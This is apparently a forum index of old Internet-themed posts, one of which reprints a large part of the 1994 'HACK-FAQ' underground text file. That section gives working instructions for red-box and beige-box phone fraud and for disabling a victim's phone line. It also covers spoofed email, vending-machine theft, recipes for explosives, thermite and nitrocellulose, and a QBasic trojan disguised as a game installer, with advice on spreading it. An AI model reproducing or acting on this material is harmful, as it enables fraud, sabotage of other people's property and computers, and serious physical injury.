Internet and WWW

Surf away…

Start New Discussion
Posted At: 3/31/2021 11:25:42 AM
Posted By: Comfortably Anonymous
Viewed: 1239 times
0 Dislikes: 0

This document describes the DoD Standard Transmission Control Protocol (TCP). There have been nine earlier editions of the ARPA TCP specification on which this standard is based, and the present text draws heavily from them. There have been many contributors to this work both in terms of concepts and in terms of text. This edition clarifies several details and removes the end-of-letter buffer-size adjustments, and redescribes the letter mechanism as a push function.

Posted At: 7/2/2020 11:09:46 AM
Posted By: PrintableKanjiEmblem
Viewed: 1867 times
0 Dislikes: 0

So Wikipedia now has what they are calling the List of Lists of Lists. Lots of interesting information.

Posted At: 1/19/2020 4:51:03 PM
Posted By: PrintableKanjiEmblem
Viewed: 1507 times
0 Dislikes: 0

So one of the cool old places on the Internet is not designed to be accessed from a web browser. ISCA BBS. This is from the EARLY days of the Internet when it was text-only and you have to access it with a text-only client called TELNET. ISCA BBS is old, and still exists, and a lot of people still hang out there. But now, you can access it via a browser!!

Posted At: 12/13/2010 2:54:07 PM
Posted By: Comfortably Anonymous
Viewed: 1810 times
0 Dislikes: 0

4Chan has begun 'Operation Frozen Vengeance' - A cyber war against precipitative solids.

Posted At: 8/20/2010 5:53:15 PM
Posted By: Comfortably Anonymous
Viewed: 1762 times
0 Dislikes: 0
No Summary
Posted At: 2/18/2010 12:54:30 PM
Posted By: Comfortably Anonymous
Viewed: 1769 times
0 Dislikes: 0

It’s the information wars. You are an Internet veteran. Act like one.

Posted At: 1/19/2010 1:54:57 PM
Posted By: Comfortably Anonymous
Viewed: 1937 times
0 Dislikes: 0

You are about to enter the Reality Zone, a place where truth is stranger than fiction, where knowledge is king, where myths are shattered and deceptions exposed.
Those who enter can never return to the Twilight Zone from which they came.

Posted At: 12/12/2008 8:39:56 PM
Posted By: Comfortably Anonymous
Viewed: 1962 times
0 Dislikes: 0

A bunch of my friends are totally impressed with this new Playstation Home for the PS3. But I don't get it.

Posted At: 4/2/2008 10:06:55 AM
Posted By: Comfortably Anonymous
Viewed: 1881 times
0 Dislikes: 0

I needed a quick thing to show the user agent string of any browser, so whipped up this User Agent Tester. Yes, there's many out there just like this, but this one is mine, and you are more than welcome to use it!

Posted At: 12/14/2007 10:14:02 AM
Posted By: Comfortably Anonymous
Viewed: 1980 times
0 Dislikes: 0

Firefox is excellent, but by default it loads pretty slowly. From an architecture/engineering standpoint, this is a good thing because (Unlike Internet Explorer) this means that Firefox does not keep things in memory when it's not actually running.

Posted At: 10/10/2005 9:33:56 AM
Posted By: Comfortably Anonymous
Viewed: 2060 times
0 Dislikes: 0
No Summary
Posted At: 3/31/2005 3:37:05 PM
Posted By: Comfortably Anonymous
Viewed: 2256 times
0 Dislikes: 0
No Summary
Posted At: 1/10/2005 2:21:56 AM
Posted By: Comfortably Anonymous
Viewed: 2563 times
0 Dislikes: 0
No Summary
Posted At: 12/28/2004 8:37:27 PM
Posted By: Comfortably Anonymous
Viewed: 2122 times
0 Dislikes: 0
No Summary
Posted At: 12/20/2004 6:28:10 AM
Posted By: Comfortably Anonymous
Viewed: 2658 times
0 Dislikes: 0
No Summary
Posted At: 12/18/2004 10:52:22 PM
Posted By: Comfortably Anonymous
Viewed: 2315 times
0 Dislikes: 0
No Summary
Posted At: 6/24/2004 9:08:07 PM
Posted By: Comfortably Anonymous
Viewed: 2716 times
0 Dislikes: 0
No Summary
Posted At: 5/12/2004 2:37:54 PM
Posted By: Comfortably Anonymous
Viewed: 3895 times
0 Dislikes: 0
No Summary
Posted At: 3/13/2004 3:37:03 AM
Posted By: Comfortably Anonymous
Viewed: 2314 times
0 Dislikes: 0
No Summary
Posted At: 3/12/2004 1:48:33 PM
Posted By: Comfortably Anonymous
Viewed: 2348 times
0 Dislikes: 0
No Summary
Posted At: 2/10/2004 1:32:46 PM
Posted By: Comfortably Anonymous
Viewed: 2023 times
0 Dislikes: 0

This is a large paragraph full of useless text to get around Slashdot's annoying "characters per line" filter. It is generously padded with long lines of text to increase the average line length significantly over it's originally puny value of 19.0. Ideally, this paragraph will let me post the above comment. I certainly don't recommend reading all this, since it is intended entirely as filler content, like the other nine songs on a pop CD. This is fluff, like the fluff that drifts from the cottonwood trees, or spewed from major news organizations like so many soggy white drifts from an industrial snowblower. Really, I'm losing my mind writing this. Ok, lets try now! Nope, still not good enough. Right now I'm at 25.7. I'm really not sure where the cutoff is, so I'll just keep going. I gotta tell you, I honestly don't think the film rights to this whole saga are gonna be worth much: didn't Dumb and Dumberer tank? Seriously, SCO should move to California where things are already so far off their rocker that even McBride would fit in. One fish, two fish, red fish, blue fish...A chicken farmer went out, one dark and windy day. He rested by the coop, as he went along his way. When all at once a rotten egg, hit him in the eye. It was the site he dreaded...ghost chickens in the sky. Ok, maybe that's enough drivel. I'll try posting again.

Posted At: 12/8/2003 2:58:00 PM
Posted By: Comfortably Anonymous
Viewed: 3532 times
0 Dislikes: 0
No Summary
Posted At: 11/14/2003 3:59:07 PM
Posted By: Comfortably Anonymous
Viewed: 2198 times
0 Dislikes: 0
No Summary
Posted At: 3/15/2003 8:08:41 PM
Posted By: Comfortably Anonymous
Viewed: 2118 times
0 Dislikes: 0
No Summary
Posted At: 3/9/2003 8:06:05 PM
Posted By: Comfortably Anonymous
Viewed: 2275 times
0 Dislikes: 0

A friend of mine had been really getting into taking pictures of storms, he's even had a few shown on the weather channel! Some really excellent pictures!

Posted At: 2/6/2003 2:49:58 PM
Posted By: Comfortably Anonymous
Viewed: 2818 times
0 Dislikes: 0

                          |    THE HAQ    |
                          | Edition  2.07 |
                          |  11 JUN 1994  |

                 "Knowledge is power" --Francis Bacon
              "United we stand, divided we fall" --Aesop

=+=+=+=+=+=+=+=+=+= HACK-FAQ!  Non-Copyright Notice =+=+=+=+=+=+=+=+=
=                                                                   =
+      MatrixMage Publications.       1994    No rights reserved.   +
=                                                                   =
+ This file may be redistributed provided that the file and this    +
= notice remain intact. This article may not under any              =
+ circumstances be resold or redistributed for compensation of any  +
= kind.  Distribution of THE HACK-FAQ! is encouraged and promoted.  =
+                                                                   +

                        <*>  Edited by  <*>

                        # Editor-in-Chief #
               Belisarius < temporary loss of E-mail >
          can be reached on ISCA, Shadow, SkyNET, Brinta and
         Baltimore 2600 Meetings and other nameless locations.

                # Asst.  Editor (non communicado) #
               Neurophire (on Shadow and N P on ISCA)

                A MatrixMage Electronic Publication

Special Thanks to the Following Contributors:
Z Maestro     RA of ISCA Underground>
DINO          RA of Shadow Hack and Crack>
Artimage      RA of SKYNET Underground>

Faunus        Revolution        Miska               Informatik
Matrixx       Amarand           Crypto Steelyhart   aBBa / PfA
Beelzebub     Redbeard          Squarewave
IO            CyberSorceror     Caustic
Doktor Nil    Skipster          Walrus
CPT Ozone     Abort             Kyoti
Carsenio      Aero              Phrack


    Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods.  This belief in mysticism persisted throughout
the ages (and still does today).  Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods.  But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered.  The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church.  But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work.  The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
     So are 'hackers' the same today.  We surf the nets seeking
knowledge and information (and hopefully understanding).  Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world.  The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before.  This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
     We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be.  This is why I have
started this publication.  We are the MatrixMages!  Our mission is
to learn and to pass on that knowledge.

                                      -=> Belisarius <=-
What is 'Cyberpunk' and the Underground?

"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby.  It gets stored, and copied, and sent out all
over the world, and people read it.  It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace.  Eventually somebody uses it, and I know that I have the
power to change the world.  Somewhere, someplace, somebody changed
something using information I changed or created.  I helped to
change the world."  --Unknown

That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture.  Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote.  And, as the quote says, they will
help spread it.  Somewhere, somehow, that quote will change the

But only if you work to change it.  Remember that information and
knowledge a powerful commodities.  He who has information cannot
be beaten.  So above all the most important thing to do in the
"Underground" is to gather information.  This means that you have to
work and put in some effort.  You don't get something' for nothing!
So work hard and together we can change the world!

Keep up with latest editions.  (Sorry there haven't been many lately
but exams and not failing out took precedence!)

The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.

   I. Phone Fun
       (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  II. Fake E-Mail
       (Fooling UUCP)
III. Social Engineering
       (Free sodas, Dumpster Diving, ATMs, Carding)
  IV. The Big Bang
       (Making Weapons and Explosives)
   V. Infection
       (Virii, Trojans, Worms and other creepy crawlies)
       (Basic Hacking)
VII. Screwing with the most widespread operating system on the net
       (UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
       (VAX/VMS Hacking)
  IX. Screwing with the most widespread operating system on PCs
       (MS-DOS Hacks)
   X. Finding out what that encrypted info is
       (Cracking programs)
  XI. How do I keep my info secure
       (PGP / Cryptology)
XII. Chemistry 101
       (explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
       (Underground electronics)
XIV. Watching television
       (cable, Pay-Per-View(PPV), scrambling)
  XV. Tuning in to what's on the radio waves
       (Radios and Scanning)

   A. FTP sites with useful info
   B. Interesting Gophers
   C. Informative USENET Newsgroups
   D. Publications and Zines
   E. Books
   F. Files and Papers
   G. Cataglogs
   H. PGP Keys

I. Phone Fun
     (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)

(from Doktor Nil)

First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.

What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
- A solder gun.
- Someone who can point out the crystal in the Tone

1) Open up the back of the tone dialer. Use screwdriver.

2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar.  It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.

3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.

4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.

5) Put cover back on. you are done.

How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.

To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.


In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.


(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)


The crystals are available from Digi-Key.  Call 1-800-DIGIKEY
(1-800-344-4539) for more info.  The part order number from
DIGI-KEY is x-415-ND


(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s

Here are the freqs for a red box:

$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
     with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
     millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!


(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT.  COCOT
is a general term for Customer owned or "Bell-independent" phone
companies.  Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.


You call up an 800 number as any public phone HAS too let you dial
800 numbers for free.  Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free.  OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.


(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
          clips, ratchet wrench, 7/16-inch hex head

1. Cut the head off one end of the phone cord.
2. Strip the coating back about two (2) inches.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
    (that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
    things sticking about 3 feet out of the ground with a Bell logo on
    the front.  If you're a lamer, you'll waste your time with a
    cable company box or something.  I've heard of it.
8. Come back to a secluded one at night.  With the wrench, open it
9. Find a set of terminals (look like the threaded end of bolts
    in my area) with what should be a red wire and a green wire
    coming off them.
10. Plug in your beige box red to red and green to green, pick up the
    phone and dial away!

Modems work too as well as taps and shit.  You're using someone
else's line (unless you're an idiot) to get phone service.  Don't
abuse the same line after the phone bill comes.


                         Field Phreaking
                           by Revolution

     At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only".  So why
the hell should I put one here?  Give this file to whoever you want,
just make sure it all stays together, same title, same byline.

     Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced.  Just be ready to bail if you see

How to make a beige box: Easiest box to make.  Cut your phone cord
before the jack, strip the wires a little.  You should see a red
(ring) wire and a green (tip) wire.  If you see yellow and black
wires too just ignore them.  Put one set of alligator clips on the
red wire and one on the green wire, and you're set.  (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord?  Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)

How to use: What you have is a lineman's handset.  You can use it
from any bell switching apparatus (from now on sw. ap.).  These are
on phone poles, where your phone line meets your house, and near
payphones.  I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack.  These screws are where you need to attach your alligator
clips to get a dial tone.  Don't unscrew the screw, you'll just
fuck up some poor guys line, and increase your chances of getting
caught.  After the wire goes around the screw, it normally twists
off into the air.  Put your clip on the end of the wire.  Do the
same with the other clip.  If you don't get a dial tone, then
switch terminals.

On telephone poles:

TTI terminals: These must have been built by phreaks, just for
beige boxing.  By far the easiest sw. ap. use.  The only drawback
is that they only connect to one phone line.  These are the fist
sized gray or black boxes that appear where a single phone line
meets the mother line.  They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front.  No bolts or screws to take
off, just snap up the top and you will see four screws.  Clip in
and happy phreaking.  Just click the top down and no one will ever
know you were there (except for the extra digits on their phone

Green trees:  just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it.  These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign.  Usually green
trees are right at the base of phone poles, or within a foot or two
of them.  These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off.  Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be.  Ratchet this one off and the metal
sheet will swing open like a door.  On one side of the sheet will
be a paper with a list of #'s this tree connects to.  Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way.  The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.

Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide.  They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts.  I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together.  Also inside
is either pressurized gas or gel.  Pretty messy.

Bell canisters:  attached to phone poles at waist level.  They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off.  Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.

Mother load: Largest sw. ap.  A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground.  a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE".  It opens like a
cabinet with double doors.  Fasteners are located in the center of
the box and on the upper edge in the center.  Both of these are
held on with a 7/16 bolt.  Take the bolts off, and swing the doors
open.  On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to.  And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects

On houses: follow the phone line to someone's house, and then down
there wall.  Either it goes right into there house (then you're
screwed) or it ends in a plastic box.  The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off.  Inside are 4 terminals, yellow,
black, and red and green, the two you need.  Find the Christmas
colors, and phreak out.

On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it.  Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one.  If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above).  Payphones are normally pretty
secure now though, and you probably won't find any of those.

Phreaky things you can do:  Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.

Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line.  Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better:  Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank:  Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his

That's it.  Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi.  Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail no PGP needed.


(from Skipster, et al)

This service is called ANI.

This number may not work, but try it anyway:
(800) 825-6060

You might want to try is dialing 311 ... a recorded message tells you
your phone #.  Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.


(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference.  Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line.  Then call
and set up a teleconference for whenever to be billed to the line
you are calling from.  You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant..


(from Token)
Just scroll through your favorite business magazine and look for
800#s.  Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc.  Like on the
INet, most people are too dumb to change their passwd.  If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).

II. Fake E-mail
     (Fooling UUCP)

(from Beelzebub, Doktor Nil w/ Belisarius)

1.  Telnet to port 25 of any internet server
       (eg. telnet 25)
2.  If at all possible, AVOID TYPING "HELO".
3.  Type: rcpt to (person to receive fake mail){ENTER}
4.  Type: mail from (fake name and address){ENTER}
5.  The mail server should ok each time after each name.
6.  If it does not:
     a) type vrfy and then the name of the person
     b) as a last resort use helo, this will login your computer as
        having been the source of the mail
7.  Retype the commands, it should say ok now.
8.  Type: data{ENTER}
9.  The first line of the message will be the Subject line
10.  Enter your letter
11.  To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
14. If the person receiving the mail uses a shell like elm he/she
    will not see the telltale fake message warning
    "Apparently-To:(name)" even if not, most people wouldn't know
    what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
    so as to make it look more believable and cover any add-ons the
    mail routine might try
16. Put a realistic mail header in the mail message to throw people
    off even more.  If there are To: and Date: lines then the
    program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
    account.  This works better if you know how to fool it.

III. Social Engineering
     (Free sodas, Dumpster Diving, ATMs, Carding)

When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully


This is an easier and actually more reliable way of getting free
sodas.  It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.



The physical layout of the cards are standard.  The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution.  There are some generally followed layouts, but not

There are actually up to three tracks on a card.

Track 1:
Designed for airline use.  Contains name and possibly your account
number.  This is the track that is used when the ATM greets you
by name.  There is alot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).

Track 2:
The main operational track for online use.  The first thing
on the track is the Primary Account Number (PAN).  This is usually
pretty standard for all cards.  Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset.  When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY.  This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated).  If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card.  Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card.  Knowing the PIN OFFSET
will not give you the PIN.  This will require the SECRET KEY.

Track 3:
The "OFF-LINE" ATM track.  It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.

IV. The Big Bang
     (Making Weapons and Explosives)

(from Neurophyre)

Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
2. Light it with a long fuse cuz its so bright it might screw up your

REAL Cherry Bomb Powder
    4 parts by weight of potassium perchlorate
        1 part by weight of antimony trisulfide
        1 part by weight aluminum powder

Relatively Safe
    3 parts by weight of potassium permanganate
    2 parts by weight of aluminum powder

*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
    4 parts by weight of potassium chlorate
        1 part by weight of sulfur
        1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get.  Use a mortar and
pestle if available, and grind GENTLY.  Do not use plastic as this can
build a static charge.  Remember, do them SEPARATELY.


AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING:  This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!!  AVOID IT when dry!  DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
   This bucket will never be clean again, in all likelihood.
   Try to get clear (non-pine, non-cloudy) ammonia.  Or use an
   ammonium hydroxide solution from a chemlab.  This results in better
   but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
   preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
   the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.


1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
   make the breach)
4. The cans should overlap and be fit together to make a long barrel
   closed at one end and open at the other.

    open -->    ()____)_____)_____)_____)_____)_____)    <--closed
    (barrel)           1     2     3     4     5     6          (breach)

5. Duct tape all of the cans together.  USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!

Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.


(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
           acid, distilled water

Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
           litmus paper

Procedure: 1.  Pour 10mL of sulfuric acid into beaker.
            2.  Pour 10mL of nitric acid into beaker with sulfuric
           3.  Immediately add 0.5 gram of cotton.
           4.  Allow it to soak for EXACTLY three(3) minutes.
           5.  Remove the nitrocellulose.
           6.  Put the nitrocellulose into a beaker of distilled
               water to wash it in.
           7.  Allow the material to dry.
           8.  Re-wash it.
           9.  Once neutral(acid/base) it can be dried and stored.


Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.

Materials: powdered aluminum, powdered iron oxide

Procedure: mix the two powders together as evenly as possible

Ignition:  thermite is difficult to ignite but these work
            a) mix a small amount of potassium chlorate into the
               thermite mixture and ignite with a few drops of
               sulfuric acid
            b) magnesium strip or 'sparkler' stuck into the powder
               which is then lit as a fuse

V. Infection
     (Virii, Trojans, Worms and other creepy crawlies)

The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
Problem:  They demand a virus they don't have in their archives to
let you in.  Good luck finding one.  The best way is to write one,
even if it's in BASIC. It'll probably get you in.  They have
THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to and dig
around in their online library under technical info.

There are alot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.


(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer

for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
                                   0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.


(from Spear)

This is a little trojan I wrote in Qbasic 4.5  It's a bitch!

REM bitch by Spear
color 14,0
print"installing datafiles...  Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
c$="md" + a$ + ".hee"
shell c$
next a
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
input "Hit ENTER To REBOOT your System now!";a$
shell ""

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root.  You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md.  To get rid of them any other way you
would have to format c: or d:

Posted At: 4/1/2002 12:41:46 AM
Posted By: Comfortably Anonymous
Viewed: 2093 times
0 Dislikes: 0
No Summary
Posted At: 10/16/2001 10:11:55 AM
Posted By: Comfortably Anonymous
Viewed: 2198 times
0 Dislikes: 0
No Summary
Posted At: 8/9/2001 9:50:36 PM
Posted By: Comfortably Anonymous
Viewed: 2269 times
0 Dislikes: 0
No Summary
Posted At: 8/1/2001 5:56:47 PM
Posted By: Comfortably Anonymous
Viewed: 2370 times
0 Dislikes: 0
No Summary
Posted At: 4/9/2001 3:31:17 PM
Posted By: Comfortably Anonymous
Viewed: 4617 times
0 Dislikes: 0
No Summary
Posted At: 3/5/2001 6:13:44 PM
Posted By: Comfortably Anonymous
Viewed: 2551 times
0 Dislikes: 0

RFC 2616 Fielding, et al.

Posted At: 3/2/2001 9:25:53 AM
Posted By: Comfortably Anonymous
Viewed: 2241 times
0 Dislikes: 0
No Summary
Posted At: 7/12/1999 1:39:10 PM
Posted By: Comfortably Anonymous
Viewed: 2477 times
0 Dislikes: 0
No Summary